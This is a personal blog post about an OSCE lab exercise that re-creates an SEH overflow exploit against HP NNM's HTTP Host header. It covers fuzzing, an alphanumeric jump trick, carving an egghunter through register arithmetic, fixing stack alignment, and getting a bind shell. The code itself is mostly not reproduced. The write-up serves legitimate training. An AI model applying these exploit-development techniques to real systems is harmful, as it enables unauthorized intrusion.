Purpl3 F0x Secur1ty

Security Research.

23 July 2019

OSCE Prep - HP NNM 0-Day Re-creation

by purpl3f0x



Holy mother of god. This module took me four days to complete, spending 3-4 hours per day after work. Problems first started during fuzzing, mostly just because I was mis-interpreting the fuzzer results and not understanding the subtle nuances of how to fuzz properly. After that, it became an almost routine SEH overflow, with some small bumps in the roatd. Then came carving the shellcode, which fell flat on its face after I painfully realised there were more bad characters than I originally thought. Finally, I spent almost 2 hours trying to get the final payload to work, only to find that changing payloads resulted in instant success. At least I learned some damn good troubleshooting methods, so it's not all bad right? Oh well, let's jump into why this was so hard.



Part 1 - Fuzzy Fuzzer Fuzzes The Server



Part of the reason I'm blogging about a well-known exploit is because I did this different from how it was done in the OSCE lab guide, and I started going my own way with the fuzzing.

Once again I have to thank mah boi h0mbre for pointing out awesome tools like this that make things a lot more interesting and stream-lined (and easy).

Following the provided instructions, I used Burp Suite to capture an HTTP GET request to the target, saved that to a file, and piped it into Boo-Gen:

 

This is the default template that Boo-Gen produced from the original request. By default, nothing will be fuzzed. Instead of wasting time fuzzing everything, I just went with the knowledge provided in the course materials to know that I had to fuzz the "Host: " section of the target. However, given the format of this fuzzing template, I wasn't sure exactly where to begin, so it still ended up being a lengthy process as I struggled to figure out where to fuzz exactly.

So I started out fuzzing the blank space after host, but that didn't crash the server. So I adjusted where the fuzzing took place:

After I started fuzzing the IP address that comes after "Host:" and a blank space, I got a crash:

So now of course I work to replicate the crash. The fuzzer sent roughly 4000+ bytes by the time this crashed, so I rounded it off to 4000 and replicated the crash manually with a skeleton exploit:

Launching this crashes the server after a noticable delay. For whatever reason, it takes 4-5 seconds after sending this to get a crash. After confirming that this will crash the server, I jump right into the usual next step of finding the offset.



Part 2 - Not a typical SEH overwrite



So as you may have noticed above, we're only overwriting SEH. In my last post, we had to overwrite both SEH and nSEH. But we only have one value here, which means that the placement of our JMP will be different, because there is no nSEH to overwrite. Before worrying about that, I go ahead with confirming the offset:

Relatively painless so far. More routine steps followed, such as confirming the offset by making sure I can accurately overwrite SEH:

Here's where things got confusing and time wasting. I had to find a POP POP RET to use, and it had to of course work with our limited character set (more on that later). I had some weird issues that I believe were due to the stack being mis-aligned(?) When I found a POP POP RET by searching, and then scrolled the Disassembly window, the commands would change. The only explanation I have is that the stack wasn't aligned right, which made some opcodes appear out of order or something to that effect. For example:

I found this, which seemed like it would work, but as soon as I scrolled....

I dunno. If anyone can explain this weird crap to me hit me up on Twitter.

Eventually, I found a working, bad-character-friendly POP POP RET, and got moving. Now is when things got a little bit tricky. Remember that we're not overwritting any nSEH here, so our jump has to be put somewhere between our A buffer and the return address. Now's the part where things get interesting (and admittedly fun).



Part 3 - The woes of Alphanumeric restrictions



I went into this knowing full-well that the big challenge of this exploit was that it only allowed alphanumberic characters, which very strictly limits the opcodes that can be injected. Basically, alphanumeric opcodes range from \x01 to \x7F. Anything over \x7F injected into our exploit will have \x7F subtracted from it to turn it back into an alphanumeric character. So right off the bat, jumping has become more complicated. I can't simply throw in a \xEB\x06 and call it a day.

So I start looking up the various methods for jumping with alpha restrictions, and I found a perfect 4-byte instruction that works well:

4C     ;DEC ESP
4C     ;DEC ESP
77 04 ;JA 04

So, to understand what was going on here, I looked up how JA works. Simply put, JA will only jump if the CF and ZF flags on the CPU are set to 0. Decrementing ESP twice sets those two flags to 0, making sure the jump triggers, and jumps 4 bytes ahead, right over the SEH overwrite.

More info on how JA works can be found here.

So at this point, the exploit looks like this:

Sending this to the server while running it in the debugger lands us right at the first C character, so now it's time for an egghunter! But we have to deal with a very tightly limited set of opcodes still, so we have to "carve out" the shellcode with very fancy maths. Get ready for some magic~



Part 3A - Making shellcode appear out of thin air~



So, before we can carve out our shellcode, we need to find a space to place the decoded shellcode and make sure it starts magically appearing in a place of our choosing. This is because we don't want to over-write the instructions that are carving out the shellcode and make everything crash. Using techniques picked up from here, I started doing the math to get ESP to where I wanted it.

After taking the short JA jump over the SEH overwrite, ESP is pointing to 1034E1E6. Scrolling down the stack, I see I have a lot of room to work with, so taking a blind but over-kill guess, I pick out address 1035FF70 as the target for my shellcode. Normally you'd calculate this very carefully if you had space limitations. But for me, all I really needed to remember is that my shellcode will be decoding in reverse, because I'm going to leverage how the stack works to make my shellcode magically appear, and remember, in x86 systems, the stack grows downward.

So, you might think that this should be as simple as adding to ESP, but we can't do that:

To add to ESP we have to use \x81\xC4, and \x81 is a bad character. So it seems almost like we can't pull this off. But we can. We can take advantage of the fact that we can underflow registers by subtracting huge numbers from them. It sounds very complext to do, but really it's not (at least not after I practiced and understood the VelloSec article).

I start by taking ESP where it is now, 1034E1E6, and subtracting where I want ESP to be, 1035FF70. The result is FFFEE276. So what am I supposed to do with this huge number? Well, following the VelloSec technique, I break the result down into individual bytes, and figure out what subtractions need to be made to make each byte equal 0, while avoiding bad characters. Seriously, just go read the VelloSec article linked above, it explains it way better than I can.

To make sense of this, let's summarize how this math works. Follow along with Windows calculator in Programmer mode to verify it for yourself, but make sure it's set to DWORD or it won't work.

1034E1E6 - 55556535 - 55556535 - 5554180C = 1035FF70.

So if we make these three subtractions, ESP will be set to where I want it. But I'm not actually going to directly subtract from ESP:

So, in the code above, three things are happening. First, I'm 0'ing out EAX (I'll explain this magic in a second). Then, I PUSH the value of ESP onto the stack, and then POP that value off the stack and into EAX. I think make my three subtractions (remembering to reverse the order of the bytes!) and finish by PUSHING EAX onto the stack and popping that into ESP.

To explain what's going on with EAX, let's convert those two values into binary:

The binary equivilant of the two hex values above:

1010101010011100100110101001010

0101010001100010011001000110101

If you AND two numbers, you'll get the following predictable results:

So if you take the two numbers above, AND them, you'll get all 0's.

Now, we're going to carve out the egghunter. The technique is the same as what was used above, except for one difference. We're going to take 4 bytes from the egghunter, subtract it from 00000000, and take that result and figure out the math. The key here is to do the last 4 bytes of the egghunter first, and work up the the first bytes.

Before I show a snippet of my work, I must disclose that this part took me much longer than expected. Turns out this server has more than just alphanumeric restrictions. It has 6 additional bad characters, which I used many....many times. I had to redo a lot of calculations and redo a lot of shellcode, which was tedius, boring, frustrating work. So now, let's get to the carving. We have to reverse the byte order of the egghunter when doing the math. For example, to calculate the math we need to carve \x75\xE7\xFF\xE7, we'll do this:

To check my math as I went, I typed my commands right into the debugger by double-clicking on lines in the Disassembler pane, executed them one-by-one with F7, and observed the stack:

The commands in the screenshot don't match up to what I provided above it, because this was taken when I was still using bad characters. I was misled into believing the commands were okay since they ran in the debugger fine, but the filtering was occuring when my exploit sent the data to the server, so these didn't work later on. But, the point is that we successfully used slick maths to perform ~magic~ and make 4 bytes of the egghunter appear out of thin air. Before every operation we repeat the AND operations to 0 EAX, then do our 3 subtractions, PUSH the value in EAX onto the stack, and repeat until we're done:

The bytes in blue are the "decoded" bytes. We now have a functional egghunter that is looking for the egg "w00t". Time for the final step, which for me, was actually the HARDEST, and MOST FRUSTRATING PART. It took a lot of troubleshooting to work it out, and a lot of time wasted manually stepping thru the debugger until I found where to set key breakpoints to really see what was happening.



Part 4 - "No reverse shell for you"



Here is where things became cruel and unusual, and where the CTP lab manual and videos become as vague as possible. From the posts on the forums, a looooooooooot of people got very tripped up by this stage, so I guess I shouldn't beat myself up over it.

So, after lots of troubleshooting that wasn't documented because it was just hours of me hitting "F7" hundreds of times to step thru instructions, I came to this conclusion:

With absolutely no idea what to investigate, I took to the OffSec forums. Everyone starts talking about "Stack Alignment, and making sure that ESP is divisible by 4. If it isn't, certain parameters vital to the shellcode get corrupted because the stack is shifted. After a while, I found the tell-tale signs that my stack was shifted:

At first I didn't think much of these oddities when I saw them, but from what I learned, seeing stuff like this means the stack is misaligned. But how did it get that way?
Oh right, to make our conditional JA jump work earlier, I decremented ESP twice.

Oddly enough, after being forced into redoing my shellcode carving math, the problem sort of fixed itself...:

Technically, ESP is now divisible by 4, but it's still shifted. I took care of this by prepending my shellcode with ADD ESP, 0x04, since my shellcode buffer isn't restricted by the alphanumberic filtering.

But even after fixing the stack, I still don't have a shell popping. Digging around on the forums and google got me nowhere. I was ready to give up. But then I started really reading the parameters being passed to ws2_32.connect() in the debugger and suddenly everything clicked.

Here we see, on the stack, the parameters being passed to ws2_32.connect(). This is telling me that the parameter "pSockAddr" is contained at the address 1035FDB0, which is directly below in the purple box. At first this meant nothing to me because 5C110002 doesn't appear to mean anything, backwards or forwards. Again, I was about to give up. But then I really paid attention to the next parameter, "AddrLen". It says 16, as in 16 bytes. Each line on the stack is only 8 bytes, so that means 1035FDB4 also contains vital info. So, going off a gut feeling, I take the bytes, reverse them, and do some translations:

I knew it. I knew that looked like an IP address! But.........that's not my IP address in the labs. That's my VM's LAN address on my actual home network. How this ended up being sent to the debugger.........I have no god damn clue. My payload was generated using my lab IP. And since the VM obviously can't get to my LAN IP, it couldn't connect back to me.

The solution was obnoxiously simple, and while I value the troubleshooting experience I gained in identifying these easy-to-miss bugs, I'm still mad that I didn't just try this sooner: Using a BIND shell instead of a reverse shell.

and........

Holy Jesus it worked.

I don't think I've ever been so happy to finally pop a shell. It was a hard-earned shell that came after hours of hair pulling and missing sleep.



Conclusion



Was this worth all the time and confusion...? I would say...yes. Because I don't doubt that the OSCE exam will throw some mind-bending curve-balls at me and it's better that I figure out how to troubleshoot my exploits while I have the luxury of time. This was the hardest module by far but probably the most beneficial. Perhaps one day before my lab time expires, I'll go back and try to get a working reverse shell, since other on the forums have said they can get it to work, but for now, I need to go do my other lab exercises while I still have lab time.



 

tags: Exploit Dev - Security Research